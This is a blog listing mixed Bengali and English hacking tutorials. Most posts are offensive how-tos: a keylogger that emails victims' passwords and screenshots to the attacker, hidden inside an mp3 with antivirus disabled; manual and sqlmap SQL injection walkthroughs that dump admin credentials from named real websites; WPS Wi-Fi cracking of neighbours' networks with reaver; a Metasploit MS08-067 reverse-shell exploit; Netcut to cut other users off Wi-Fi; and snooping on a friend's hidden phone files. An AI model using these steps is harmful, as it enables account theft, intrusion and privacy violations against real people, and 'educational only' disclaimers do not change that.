Showing posts with label Hacking Tune. Show all posts
Showing posts with label Hacking Tune. Show all posts

13/05/2016

এবার হ্যাক করুন নকিয়া ১২০২/১২৮০ এরকম সিরিজের ফোনগুলোর Bounce গেমটি

এবার হ্যাক করুন নকিয়া ১২০২/১২৮০ এরকম সিরিজের ফোনগুলোর Bounce গেমটি|

সালাম| আমি ভাল আপনারা? আজ হাজির হলাম নতুন একটা ট্রিক নিয়ে …হ্যাক করুন বাউন্স গেমটি আর খেলুন ইচ্ছামত

বাউন্স গেমটি ওপেন করে দ্রুত 7878987 এই কি গুলি চাপুন ব্যাস হ্যাক হয়ে গেল এখন আর আপনি ডেড হবেন না|

বিদায়| কথা কিন্তু একটাই ভাল থাকবেন ভাল রাখবেন|

12/02/2016

How To Hack FB Account by keylogger

HOW TO HACK FACEBOOK WITH KEYLOGGER. Today we are really going to take a very hot tutorial on how to hack facebook with keylogger,alot of people have been sending me mail to post a tutorial on how to Hack fb,please for those that does not like hacking please don't be offended by this post,and i hope one day dat when u forget ur pc password or have any problem that will need the help of hacking maybe by then u will know the value of hacking,and in this group will do not use our hacking for evil,and if we find out dat any members does evil with the hacking tutorial,he/ she will be banned from the group,so take ur time and go through this tutorial.and i hope u will love it. Keylogger to hack into anyone’s facebook account. Keylogger does more than hacking facebook account password. This keylogger will mail you all the saved passwords on your victims PC to your Gmail account. As Most facebook addicts do save their password in their web-browser, there is high possibility that you will get facebook login details. Alon with this the keylogger will also mail you all the information about your Victim. This information includes Screenshots, opened window details, visited websites and much more. Not all hacking softwares and keyloggers are Anti- Spywares Shielded. Most Antivirus Softwares are familiar with these free keyloggers and they might flag this keylogger as a Virus. So to experience this keylogger you might need to temporarily turn off your antivirus or uninstall it. But Don’t worry, if your victims antivirus is not up to date or freeone, there are high chances that you may end up getting his keylogs. So give it a Try. Recommended: Buy Antivirus shielded SniperSpy key-logger that operates in stealth mode! -Features of Emissary Keylogger: Can mail all the Keystrokes including login details Can send screenshots of the victim’s Screen Can Block VirusScanning Websites on victim’s computer Can Disable TaskManager on victim’s PC Can Disable Regedit on victim’s PC -How to hack facebook password with keylogger First make sure you have ‘Microsoft’s .net Framework‘ installed on your PC, if you dont have pleasedownload and install it.
  • The victim need not have .net framework. Follow the Steps below: Step 1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again. Step 2: Run ‘Emissary.exe’ file and enter your gmail account details, so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details. Step 3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account. In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field. Step4: Now after filling the required fields, Click ‘Build’ button. This will create another file called server.exe in the same directory. Step5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge. also read: How to change ICON of .exe file? [ * ] Now because this is a free keylogger, you can’t send server.exe file via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, rapidshare, filethief etc. Step6: Once the victim runs your sent keylogger file on his computer, it searches for all the stored usernames and passwords and it will send you email containing all keylogs and screenshots regularly after the specified ‘Time interval’ NOTE:This post is for educational purpose only. Please help invite ur friends to the group IF U LIKE THIS POST CLICK ON LIKE.
Download it: Download

11/10/2015

আপনার ওয়াইফাই পাসওয়ার্ড জানলেও ইন্টারনেট চালাতে পারবে না কেউ

বিস্তারিতঃরাউটারে এক্সেস কন্ট্রোল করার সুযোগ সুবিধাঃ
*.কোন ইউজার আপনার অনুমতি ছাড়া আপনার ইন্টারনেট চালাতে বা অ্যাক্সেস করতে পারবেন না।
*.আপনি যে কোন ইউজারকে যেকোন সময় অক্ষম/ ইনঅ্যাক্টিভ করে দিতে পারবেন।
*.আপনি আপনার রাউটারটি পাসওয়ার্ড ছাড়াও ব্যবহার করতে পারবেন।
*.একজন ইউজারকে আপনি যেভাবে চান সময় নির্ধারণ করে নেট দিতে পারবেন।এখন প্রশ্ন হল কিভাবে কাজটি করবেন। শুধুমাত্র
২টি ধাপ অনুসরণ করুন কাজটি করার জন্য।
১ম ধাপ-:প্রথমে আপনার রাউটার এ লগইন করুন। তারপর Access Control এ গিয়ে Enable Internet Access Control
অপশনটি অ্যাক্টিভ করে দিন। নিচের ছবির মতএবার যান
>Access Control>Host
এ গিয়ে Add New এ ক্লিক করুন। নিচের ছবির মতএবার Mode এ গিয়ে Ip address এ ক্লিক করে MAC Address সিলেক্ট করুন। Host Description এ আপনার পছন্দের যে কোন একটি নাম দিন এবং MAC Address গিয়ে আপনার ল্যাপটপ/ ডেক্সটপ/মোবাইলের MAC অ্যাড্রেস দিন তারপর সেভ করুন।
২য় ধাপ-:এখন কাজ হল রুল তৈরি করা। এজন্য যান
>access Control>Rule এ গিয়ে Add New এ ক্লিক করুন। তাহলে নিচের ছবির মত দেখতে পাবেন।এবার Rule Name এ যে কোন একটি নাম দিন, host এ ১ম ধাপে যে নামে host তৈরি করেছিলেন তা সিলেক্ট করে দিন। এবার সেভ করে ফেলুন। ব্যাস কাজ শেষ। এবার আপনার ওয়াইফাই এর পাসওয়ার্ড কেও জানলেও কোন সমস্যা নেই।

17/07/2015

WI-FI hacking Tricks, for Pc user.

অনেক সাধনার পর খুঁজে পেলাম Wi-Fi হ্যাকের পদ্ধতি। এতদিন অনেকস্থান থেকে অনেক ধরনের পদ্ধতি পেয়েছি কিন্তু কোনটাই ভালোভাবে কাজ করেনি। কিন্তু এবার যে পদ্ধতিটা পেয়েছি সেটা একদম ১০০% কাজ করে!! এইরকম যদি হয় আপনি কোন অফিসে বা স্থানে গিয়েছেন যেখানে আপনার ল্যাপটপে কর্তৃপক্ষ পাসওয়ার্ড সেট করে দিয়েছে কিন্তু আপনি জানেন না! বা আপনাকে দেয়া হয়নি সেই ক্ষেত্রে এই পদ্ধটিতি দারুন কাজ করে। এক্ষেত্রে আপনাকে একটু কষ্ট করে সেই ওয়াই ফাই নেটওয়ার্কের SSID টা জানতে হবে। আর এটা খুঁজে বের করা খুবই সহজ। যেকোন ওয়াইফাই নেটওয়ার্কের যে নামটি থাকে তার শেষের ওয়ার্ড/ সংখ্যাগুলো হচ্ছে তার SSID. এবার যেটা করতে হতে তা স্টেপ বাই স্টেপ ফলো করুনঃ প্রথমে, আপনার উইন্ডোজের RUN এ প্রবেশ করুন। Windows Button+R চাপলে রান এসে যাবে। দ্বিতীয়ত, আপনি সেখানে cmd টাইপ করে এডমিনিষ্ট্রেটর মুডে প্রবেশ করুন। তৃতীয়ত, সেখানে নিচের লেখাটুকু হুবহু টাইপ করুনঃ netsh wlan show profile name=labnol key=clear name=এখানে আপনার নেটওয়ার্কের SSID টাইপ করুন। তারপর এন্টার বাটন চাপুন চতুর্থত, সেখানে দেখুন আপনার ওয়াইফাই নেটওয়ার্কের নাম এবং পাসওয়ার্ড শো করবে। (যদি কোন কারনে পাসওয়ার্ড না শো করে তবে বুঝতে হবে আপনি CMD তে এডমিনিষ্ট্রেটর মুডে প্রবেশ করেননি।) যদি কোন কারনে পদ্ধতিটি কাজ না করে তাহলে পূনরায় টিউনটি খুব মনযোগ সহকারে পড়ুন। তারপর ধাপে ধাপে খুব ঠান্ডা মাথায় স্টেপগুলো ফলো করুন। কোনভাবেই তাড়াহুড়ো করবেন না। বিশেষ করে খেয়াল রাখবেন RUN থেকে CMD যেন অবশ্যই অবশ্যই Administrator মুডে ওপেন করা হয়। তাহলে সব ঠিকঠাকভাবে কাজ করবে।
(বিদ্রঃ আপনি ওয়াইফাই কানেক্টেড না এইরকম নেটওয়ার্কের পাসওয়ার্ড হ্যাক করা কখনই সম্ভব নয়। আপনি একবার ভেবে দেখুন, আপনার ওয়াইফাই যদি অন্য একজন কোন পরিশ্রম ছাড়াই বা আপনাকে পে করা ছাড়াই ব্যবহার করে তখন আপনার মনে কেমন লাগবে??)

13/07/2015

হ্যাকিং করুন SQL ইঞ্জেকশন দিয়ে | বাংলায় হ্যাকিং-পর্বঃ ১

SQLInjection1_1.jpgSQL Inj3cti0n কি ?
সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।
যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?
না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।
কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?
যেই সব সাইটে id=value থাকে ধরুন http://www.site.com/news.php?id=5 সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি ‘(string) দিতে হবে। উদাহরণঃ http://www.bayviewhotelni.com /news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি ‘(string) দিবেন তখন ঠিকই error আসবে। http://www.bayviewhotelni.com /news.php?id=3′ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”3”’ at line 1 অথবা অনেক সময় দেখতে পারবেন যখন ‘ বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে। অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।
কিভাবে SQL inj3ction করবো কোনো সাইটকে ?
প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়। ডাউনলোড করে নিন এখান থেকে : Go Here ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।
সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-
আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড। http://www.sparkleappealdorset.org /supporter.php?id=7 order by 1– http://www.sparkleappealdorset.org /supporter.php?id=7 order by 2– http://www.sparkleappealdorset.org /supporter.php?id=7 order by 3– এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে। http://www.sparkleappealdorset.org /supporter.php?id=7 order by 11– দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে। Vulnerable কলাম বের করার নিয়ম :- এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো। প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি – চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org /supporter.php?id=-7 http://www.sparkleappealdorset.org /supporter.php?id=-7 UNION SELECT 1,2,3,4,5,6,7,8,9,10– 334nj84.jpgডাটাবেজ ভার্শন বের করার নিয়ম:-
যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো। এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে। ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো। তাহলে syntax টি হবে http://www.sparkleappealdorset.org /supporter.php?id=-7 UNION SELECT 1,version(),3,4,5,6,7,8,9,10– vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।
ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()– তাহলে syntax টি দাড়ায় http://www.sparkleappealdorset.org /supporter.php?id=-7 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()– যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।
এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড–
2hyjxx0.jpg তাহলে syntax টি দাড়ায় http://www.sparkleappealdorset.org /supporter.php?id=-7 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e– blank.gifএডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম। http://www.sparkleappealdorset.org /supporter.php?id=-7 UNION SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin– acswmg.jpg বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার কিছু কথাঃ এই টপিকটা সহজভাবে বোঝানোর চেস্টা করেছি তাই ভাল লাগলে অবশ্যই ধন্যবাদ জানাবেন xD বিঃদ্রঃ এই পোস্টটির কপিরাইট সম্পূর্ণ সংরক্ষিত এবং বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া আর কোথাও এটা লিখা/পোস্ট করা যাবে না।

07/07/2015

Sqlmap দিয়ে SQL Injection করে বের করুন ওয়েবসাইটের এডমিনের Username নেম আর Password ! [Only for Kali Linux

আসসালামু আলাইকুম !! কেমন আছেন সবাই ? আজ আমরা শিখবো Sqlmap দিয়ে কিভাবে auto SQL injection করে ওয়েবসাইট এর ডাটাবেস থেকে এডমিন এর ইউজার নেম এবং পাসওয়ার্ড বের করতে হয় ! ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection ! আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান ! কোনো সাইট SQL Injection এর যোগ্য কিনা তা জানতে Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যবহার করতে পারেন ! অথবা গুগল ডর্ক ব্যবহার করতে পারেন !! আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পেয়েছেন যেটা SQL Injection এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable ! তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : http://www.yoursite.com /index.php?id=32 ! এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে ! তাহলে আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32--dbs তারপর আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন ! উদাহরন ১ : Scan all directory (Y/n) Y বড় হাতের তাহলে Y লিখে Enter চাপুন ! উদাহরন ২ : Cancle Scane (y/N) N বড় হাতের তাহলে N লিখে Enter চাপুন ! কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস ! এমন: *information_schema *yoursite তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32-D yoursite --tables ভেঙ্গে বলতে হবে ?? টেবিল পাবো এমন : user files admin email তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin --columns কলাম পাবো এমন : admin_username admin_password তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin -C admin_username --dump [ Username ] [ ] [ BOLOD ] [ ] একই ভাবে পাসওয়ার্ড বের করব : আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin -C admin_password --dump [ Password ] [ ] [ 123456 ] [ ] কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে ! [Note -- এটা একদম নতুনদের জন্য নয় ! আর ট্রাই না করে " কাজ করে না এই সেই " টিউমেন্ট করবেন না দয়া করে ! আগে ট্রাই করুন ১০০% কাজ করবে !]

25/05/2015

প্রতিবেশীদের WIFI HACK করুণ (এক্সপার্ট দাদাদের জন্য নয়) Tutorial.2

প্রতিবেশীদের WIFI HACK করুণ (এক্সপার্ট দাদাদের জন্য নয়) এইটা করার জন্য আপনাকে অবশই লিনাক্স এর যে কোন ভার্সন ইন্সটল করে নিতে হবে তবে ভাল হয় যদি (Linux mint,Ubuntu , kbuntu) এসব ভার্সন ইন্সটল করা থাকে । এবার ctrl+alt+t press করুন terminal ওপেন করুন please install Aircrak-ng by typing - sudo apt- get install aircrack-ng এইটা লিখে এন্টার করুন যথারীতি আপনার পিসির পাসওয়ার্ড চাইবে পাসওয়ার্ড লিখে এন্টার করুন আর হ্যাঁ এর আগে নেটটা পিসির সাথে connect করতে ভুলবেন না । তারপর আবার ইন্সটল করুন Reaver pls type : sudo apt-get install reaver আবার আগের মত এন্টার চাপার পর পাসওয়ার্ড চাইবে ,পাসওয়ার্ড দিন অ্যান্ড এন্টার এবার নেট connection অফ করে পিসি restart করুন। এবার আপনাকে অবশ্যই সামান্য ধৈর্যর পরীক্ষা দিতে হবে terminal ত ওপেন ই আছে না থাকলে ওপেন করে নিন টাইপ করুন sudo airmon-ng start waln0 লিখে এন্টার করন পাস কোড চাইবে দিন দেখবে নিচে একটা লেখা আসবে ( monitor mode enabled on mon1/mon0/mon4) ব্যাস হয়ে গেল প্রথম স্টেপ please type : sudo airodump-ng mon0 (এখানে MONO র সাথে zero hobe ) এবার আপনি দেখবেন আশে পাশের ওয়াইফাই র নেট গল শো করছে now final step press cntrl+c sudo reaver -i mon0 -b (your desired bssid) - vv -d 0 -S example : sudo reaver -i mon0 -b C8:3A:35:265:31 -vv -d 0 -s press enter and wait for while, then u will show after some time like this wps pin:25452006 wps psk:sakkhor /whatever they used their name as network ap ssid : tplink /tenda/whaterver they used enjoy !!!!!!!!!!! enjoy!!!!!!!!! enjoy!!!!!!!! THIS WILL BE WORKED ON THIS TYPE NETWORK WPA/WPA2 TYPE NETWORK

এনড্রয়েড এপস Vaulty হ্যাক করুন আর বন্ধুকে মজা দেখান

আজ আপনাদের জন্য লিখতে বসছি একটি এনড্রয়েড এপস Vaulty হ্যাকিং নিয়ে। আশা করি কমেন্ট করে আপনার কথাগুলো জানাবেন। প্রথমেই বলে নেই আমি এনড্রয়েড ব্যবহার করিনা। আমার বন্ধুর সাথে মজা করে এই ট্রিকসটি আবিষ্কার করেছি। আগে হয়তো এটি বিভিন্ন জায়গায় শেয়ার হয়ে থাকবে তবে আমার চোখে পড়েনি তাই শেয়ার করলাম। এটি সম্পূর্ণভাবে আমার মষ্তিস্কপ্রসূত। কারো ক্ষতির উদ্দেশ্যে ব্যবহার আইনত দন্ডনীয় অপরাধ এবং এর অপব্যবহারে আমি দায়ী থাকব না। আমরা অনেকেই এনড্রয়েডে নিজেদের ব্যক্তিগত তথ্য (যেমন: ছবি, ভিডিও ….) লুকিয়ে রাখতে বা সিকিউর করতে Vaulty নামে একটি এপ ব্যবহার করি। আর ভাবি যে, এই বার আমি নিরাপদ। তবে আশাকরি এইবার আর আপনি নিরাপদ নন :v যাইহোক, শুরু করি Vaulty হ্যাকিং যা যা লাগব একটি এনড্রয়েড মোবাইল (আমাদের টার্গেট) Vaulty ইন্সটল করা EsExplorer (নামটা ঠিক আছে কিনা মনে নাই) বুদ্ধি প্রথমে আপনার বন্ধুর মোবাইলটা একটু কায়দা করে সরিয়ে নিন। এবার তার মোবাইলে EsExplorer ইন্সটল করুন (যদি না থাকে) । আর ইন্সটল করা থাকলে সেখানে ঢুকে অপশন থেকে হিডেন ফাইল্স শো করার অপশন টিক দিয়ে দিন। (আমার কাছে এখন এনড্রয়েড না থাকায় স্ক্রিনশট দিতে পারছি না, তাই সরি) এবার প্রায় আমরা কাছাকাছি চলে এসেছি। এবার DCIM ফোল্ডার থেকে .Vaulty ফোল্ডারে ঢুকুন। অথবা, Vaulty লিখে সার্চ দিন। এবার সেখানে অনেক ফাইল দেখতে পাবেন(আর ফোল্ডার আছে কিনা সিউর না ) এবার একটু বুদ্ধি লাগবে। কারন আমরা এবার ফাইল রিনেম করে এক্সটেনশন চেন্জ করব। ফোল্ডারের ফাইলগুলার প্রপার্টিস চেক করুন। যেগুলোর সাইজ বড় সেগুলো ভিডিও হওয়ার সম্ভাবনা আছে। এভাবে একটু অনুমান করে .vdata এক্সটেনশন .mp4 , .3gp , .jpg ….. এভাবে পরিবর্তন করে দেখুন। অথবা পরবর্তীতে করার জন্য ফাইলগুলো আপনার মোবাইলে ব্লুটুথ দিয়ে নিয়ে নিন। ব্যস এবার কাজ শেষ। এবার যতখুশি আপনার বন্ধুকে চ্যালেন্জ দিন বা দেখে নিন তার গোপন ছবি বা ভিডিও [বি:দ্র: এটি করার আগে আপনার বন্ধুর অনুমতি নিয়ে নিন, অনুগ্রহ করে কারো ক্ষতি করবেন না] [কারো ক্ষতি হলে এই পোস্টের লেখক দায়ী থাকবে না] আমি এই পদ্ধতি ব্যবহার করেছি নিম্নোক্ত মোবাইল Symphony Xplorer W15 Symphony Xplorer W65i এবং সফল হয়েছি। তাই আমি নিশ্চয়তা দিতে পারব না যে সকল মোবাইলে কাজ করবে। তবে আপনি কোন ধরনের মোবাইলে সফলতা পেয়েছেন তা অবশ্যই জানাবেন। ধন্যবাদ।

শুধু IP ব্যবহার করে যে কারো ১২টা বাজিয়ে দিন!! (update)

এটা একটু Advance Level এর হ্যাকিং। অনেকেরই হয়ত বুঝতে অসুবিধা হতে পারে। সেক্ষত্রে কমেন্টস করুন শুধু কি IP সিস্টম হ্যাক করা সম্ভব, হ্যা। কারন NetAPI32.dll(CVE-2008-4250) দুর্বলতা।.[netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network] (Details about Server Service Vulnerability(MS08-067): Microsoft Windows Server service provides support for sharing resources such as files and print services over the network. The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected. A malicious request to vulnerable system results in complete compromise of vulnerable computers. This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue. Exploiting the MS08-067 using Metasploit) আপনার টার্গেট সিস্টেম যদি Vulnerable OS ব্যবহার করে তাহলে আপনি তাকে খুব সহজেই হ্যাক করতে পারবেন। এই প্রক্রিয়া সম্পন্ন করতে যেগুলো প্রয়োজনঃ Virtual Box Backtrack 5 Target OS Step One: Create Virtual Machine দুইটি Virtual Machine তৈরি করুন, একটার নাম দিন Target OS এবং অন্যটার নাম দিন BT5। Target OS এ Windows XP Install করুন, এবং BT5 এ Backtreack 5 Install করুন। আপনার যদি Virtual Machine সম্পর্কে ধারনা না থাকে তাহলে VM Manual পড়ুন। Step Two: Find the IP address of Target Target এর IP বের করার জন্য VM(XP) তে cmd prompt ওপেন করুন(W R cmd and hit enter) এবং টাইপ করুন ipconfig এবং Enter প্রেস করুন। (সাধারনত Advance হ্যাকাররা IP জানতে অন্য ধরনের পদ্ধতি অনুসরন করে, যেমনঃ Angry IP Scanner বা লিঙ্ক পাঠিয়ে ও অনেকেই IP বের করেন। Step three এবার আমরা namp tool ব্যবহার করব। BT5(Backtrack 5) Start করুন এবং Terminal Open করুন Type করুনঃ nmap -O 192.168.56.12 এখানে 192.168.56.12 হল Target machine এর IP ।ফলাফল দেখুন, আপনি টার্গেট এর open port এবং OS দেখতে পাবেন। Step four: Metasploit এবার BT5 এর Terminal ওপেন করুন, (Ctrl Alt T)এবং টাইপ করুন msfconsole। Msfconsole, Metasploit Framework এর সবচেয়ে জনপ্রিয় একটা বৈশিষ্ট্য। এবার আমরা সার্চ কমান্ড ব্যবহার করব।, এজন্য “search netapi” টাইপ করুন। এবার আপনি অবশ্যই netapi এর সাথে Module Match লিস্ট দেখতে পাবেন। এবার আমরা MS08-067, exploit করব। সুতরাং টাইপ করুনঃ “use exploit/windows/smb/ ms08_067_netapi“ Step 5: Set Payload Type “set payload windows/ meterpreter/reverse_tcp” in the msfconsole. Step 6: Options Type “set LHOST 192.168.56.10“. এখানে 192.168.56.10 হল Backtrack এর IP। আপনি টার্মিনালে ‘ifconfig’ লিখেও এটা পেতে পারেন। এবার Type “set RHOST 192.168.56.12“ এখানে 192.168.56.12 হল টার্গেট মেশিন এর IP। Step 7: Exploiting এবার এটা দুর্বলতার সুযোগ নেয়ার সময় সুতরাং type “exploit” in the console, যদি এক্সপ্লয়েট সাক্সেস হয় টাহলে আপনিও নিচের মত ফলাফল দেখতে পাবেন। এখন আপনি Remote Computer কে নিজের মত Control করতে পারবেন। যেমন Screen Shot নেয়ার জন্য টাইপ করুন, “screenshot” এবং দেখুন আপনার ভিক্টিমের Screen Shot

সুপার ডুপারঃ অন্যের wifi zone এ সবাইকে BLOCKকরে একাই উপভোগ করুন সম্পূর্ন স্পিড

সুপার ডুপারঃ অন্যের wifi zone এ সবাইকে BLOCK করে একাই উপভোগ করুন সম্পূর্ন স্পিড আজ আমি যে Software টি করতে যাচিছ তা হলো Net cut.exe এই Software টি দিয়ে আপনি wifi zone এর মালিক না হয়েও সবাইকে ব্লক করতে পারবেন এবং একাই মজা লুটতে পারবেন । এটা যে কোন personal বা free wifi zone এ কাজ করবে । প্রথমে আপনি software টা ওপেন করুন এবং ডান পাশে refresh now তে ক্লিক করুন । তারপর আপনি যাকে cut off বা block করতে চান তাকে সিলেক্ট করুন এবং cut off এ ক্লিক করুন ব্যস আপনার কাজ শেষ এখন আপনি একাই মজা লুটুন এবং হয়ে যান একজন মিনি হ্যাকার... Click Here To Download

21/03/2015

Mega Post একাধিক ফেসবুকএবং ইমেইল এ্যাকাউন্ট হ্যাক করুনঅন্যরকম একটি পদ্ধতিতে

একাধিক ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করুন অন্যরকম একটি পদ্ধতিতে কেমন আছেন সবাই। আশা করি ভাল। আজ আপনাদের সাথে অন্যরকম একটি পদ্ধতিতে ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করা বিষয়ে আলোচনা করব। এর মাধ্যমে আপনি একাধিক ফেসবুক এবং ইমেইল এ্যাকাউন্ট হ্যাক করতে পারবেন। তবে সবার প্রতি অনুরোধ কারো ক্ষতি করবেন না এটি দিয়ে। শুধু শেখার জন্য আমার এই টিউটোরিয়াল। আজকে আপনাদের সাথে একটি পদ্ধতি শেয়ার করব । যেটা দিয়ে আপনারা ইমেইল এবং ফেসবুক পার্সওয়ার্ড হ্যাক করতে পারবেন। অনেকে জিঙ্গাসা করেছিল টিপস্ টা বলতে। তাই এখানে পোষ্ট টা করে দিলাম । যাক এখন সরাসরি টিউটোরিয়াল এ চলে যাব। এই পদ্ধতিটি আমরা HAVIJ দিয়ে করব । বিষয়টি যারা জানেন তাদের জন্য সহজ হবে। HAVIJ ডাউনলোড করুন এখানে click here ১. এরপর প্রথমে আপনি HAVIJ ওপেন করুন। আপনার এখন vlunerable একটি ওয়েবসাইট লাগবে যেখানে ইমেইল দিয়ে রেজিষ্টার করতে হয়। আমরা একটা সাইট নিলাম http://singhaniauniversity.co.in/newsDetails.php?ID=46 এটা HAVIJ দিয়ে এ্যানালাইজ দেন। ২. এখন আপনি Tables থেকে website_database বক্স্ টি সিলেক্ট করে Get Tables ট্যাব বাটনে ক্লিক করুন। সেখানে আপনাকে অনেকগুলো Table দেখানো হবে। 